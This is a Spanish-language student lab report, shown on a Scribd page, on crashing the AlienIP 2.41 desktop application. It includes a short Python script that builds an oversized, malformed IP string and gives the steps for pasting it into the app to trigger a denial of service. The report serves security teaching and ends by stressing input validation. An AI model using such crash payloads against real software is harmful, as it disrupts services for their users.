[go: up one dir, main page]
Scribd
Cargar
16 vistas4 páginas

Sanchez Chavez Oswaldo Practica 6 2do Parcial

La práctica 6 del Instituto Politécnico Nacional demuestra la explotación de una vulnerabilidad de Denegación de Servicio (DoS) en la aplicación AlienIP 2.41 mediante el uso de un código en Python que genera una cadena malformada. Al ejecutar el ataque, se logró que la aplicación se cerrara inesperadamente, evidenciando la falta de control en la gestión de entradas. Esto resalta la necesidad de implementar validaciones estrictas para prevenir vulnerabilidades en aplicaciones.

Cargado por

osanchezchavez15
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
16 vistas4 páginas

Sanchez Chavez Oswaldo Practica 6 2do Parcial

La práctica 6 del Instituto Politécnico Nacional demuestra la explotación de una vulnerabilidad de Denegación de Servicio (DoS) en la aplicación AlienIP 2.41 mediante el uso de un código en Python que genera una cadena malformada. Al ejecutar el ataque, se logró que la aplicación se cerrara inesperadamente, evidenciando la falta de control en la gestión de entradas. Esto resalta la necesidad de implementar validaciones estrictas para prevenir vulnerabilidades en aplicaciones.

Cargado por

osanchezchavez15
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 4

Instituto Politécnico Nacional

Escuela Superior de Ingeniería Mecánica y Eléctrica


Unidad Culhuacán

Práctica 6
“Segundo Departamental”

Ciclo:
2025 / 2

Grupo:
6CV23

Unidad de Aprendizaje:
Sistemas Operativos

Profesor:
De La Cruz Téllez Arturo

Alumno:
Sánchez Chávez Oswaldo
A. Introducción
En esta práctica se realizó la explotación de una vulnerabilidad conocida como Denegación de
Servicio (DoS) en la aplicación AlienIP versión 2.41. Este tipo de ataque busca provocar la
interrupción del funcionamiento normal de un sistema, aplicación o servicio, enviando datos
malformados o cantidades excesivas de información, causando que el programa se bloquee o
cierre inesperadamente.

Para este ejercicio, se utilizó un código en Python que genera una cadena especialmente diseñada
para hacer que la aplicación AlienIP.exe se cierre de forma abrupta al intentar procesar una
dirección IP malformada.

B. Objetivo
Demostrar cómo una aplicación vulnerable puede ser forzada a fallar mediante la explotación de
una mala gestión de entradas, simulando un ataque de tipo Denegación de Servicio (DoS) por
medio de una cadena de texto malformada.

C. Herramientas utilizadas
▪ Python
▪ AlienIP 2.41
▪ Sistema Operativo: Microsoft Windows 10
▪ Editor de texto
D.Procedimiento
I. Se ejecutó el siguiente código en Python:

buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69

buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69

f = open("AlienIP2.41.txt", "w")

f.write(buffer)

f.close()

II. Esto generó un archivo llamado AlienIP2.41.txt que contiene una cadena compuesta por una
secuencia repetitiva del carácter A (hex 0x41) y algunos puntos .
III. Se abrió el archivo AlienIP2.41.txt y se copió su contenido al portapapeles.
IV. Se ejecutó la aplicación AlienIP.exe.
V. En el campo de IP Address o Country, se pegó la cadena copiada.
VI. Se presionó el botón Locate Host.
VII. La aplicación se cerró inesperadamente, mostrando un error de que AlienIP dejó de
funcionar.

E. Resultados
Al realizar el procedimiento descrito, se logró que la aplicación AlienIP 2.41 se cerrara de forma
abrupta al procesar una dirección IP malformada. Esto confirma que la aplicación no cuenta con
un adecuado control de las entradas de usuario y es vulnerable a ataques de tipo Denegación de
Servicio (DoS).

3
F. conclusión
Mediante esta práctica se comprobó cómo una mala validación de entradas en una aplicación
puede permitir que se realicen ataques DoS, afectando su disponibilidad. Este ejercicio refuerza
la importancia de implementar validaciones estrictas sobre los datos recibidos desde el usuario
para prevenir vulnerabilidades explotables.

También podría gustarte